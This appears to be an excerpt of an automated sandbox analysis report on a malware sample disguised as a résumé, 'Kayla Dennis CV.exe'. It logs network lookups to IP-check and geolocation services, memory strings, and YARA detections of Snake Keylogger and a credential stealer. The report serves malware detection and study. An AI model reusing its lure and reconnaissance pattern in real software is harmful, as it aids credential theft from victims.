                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49712 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49725 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: RegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: RegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003090000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003165000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B3E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 0000000B.00000002.3288992952.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: Kayla Dennis CV.exe, 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: Kayla Dennis CV.exe, lyKbfEsVYfQfU.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: Kayla Dennis CV.exe, lyKbfEsVYfQfU.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: RegSvcs.exe, 0000000B.00000002.3296169497.0000000006600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microHy1s.
                Source: Kayla Dennis CV.exe, lyKbfEsVYfQfU.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: RegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: Kayla Dennis CV.exe, 00000000.00000002.2131860326.0000000003421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, lyKbfEsVYfQfU.exe, 0000000C.00000002.2224356364.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: Kayla Dennis CV.exe, 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187
                Source: RegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187$
                Source: Kayla Dennis CV.exe, lyKbfEsVYfQfU.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: Kayla Dennis CV.exe, lyKbfEsVYfQfU.exe.0.drString found in binary or memory: https://www.google.com/#q=
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725

                System Summary

                barindex
                Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: Kayla Dennis CV.exe PID: 6300, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Kayla Dennis CV.exe PID: 6300, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: RegSvcs.exe PID: 7364, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 7364, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeCode function: 0_2_07D716F80_2_07D716F8
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeCode function: 0_2_07D716E70_2_07D716E7
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeCode function: 0_2_07D7A3CB0_2_07D7A3CB
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeCode function: 0_2_07D730330_2_07D73033
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeCode function: 0_2_07D79FA00_2_07D79FA0
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeCode function: 0_2_07D7BEE80_2_07D7BEE8
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeCode function: 0_2_07D7AC480_2_07D7AC48
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeCode function: 0_2_07D7A8100_2_07D7A810
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeCode function: 0_2_07D7A8000_2_07D7A800
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeCode function: 0_2_0B1D1F580_2_0B1D1F58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012F610811_2_012F6108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012FC19811_2_012FC198
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012FC47011_2_012FC470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012FB4A011_2_012FB4A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012F673011_2_012F6730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012FC75411_2_012FC754
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012F985811_2_012F9858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012FBBDC11_2_012FBBDC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012FCA3411_2_012FCA34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012F4AD911_2_012F4AD9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012FBEB011_2_012FBEB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_012F357811_2_012F3578
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeCode function: 12_2_079916F812_2_079916F8
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeCode function: 12_2_079916E712_2_079916E7
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeCode function: 12_2_0799A3CA12_2_0799A3CA
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeCode function: 12_2_0799303312_2_07993033
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeCode function: 12_2_07999EC812_2_07999EC8
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeCode function: 12_2_0799BEE812_2_0799BEE8
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeCode function: 12_2_0799AC4812_2_0799AC48
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeCode function: 12_2_0799A81012_2_0799A810
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeCode function: 12_2_0799A80012_2_0799A800
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeCode function: 12_2_0B030FC712_2_0B030FC7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0101610817_2_01016108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0101C19017_2_0101C190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0101B32817_2_0101B328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0101C47017_2_0101C470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0101673017_2_01016730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0101C75117_2_0101C751
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0101985817_2_01019858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0101BBD217_2_0101BBD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0101CA3117_2_0101CA31
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01014AD917_2_01014AD9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0101BEB017_2_0101BEB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0101357017_2_01013570
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0101B4F317_2_0101B4F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563548817_2_05635488
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_056399A817_2_056399A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563A0D017_2_0563A0D0
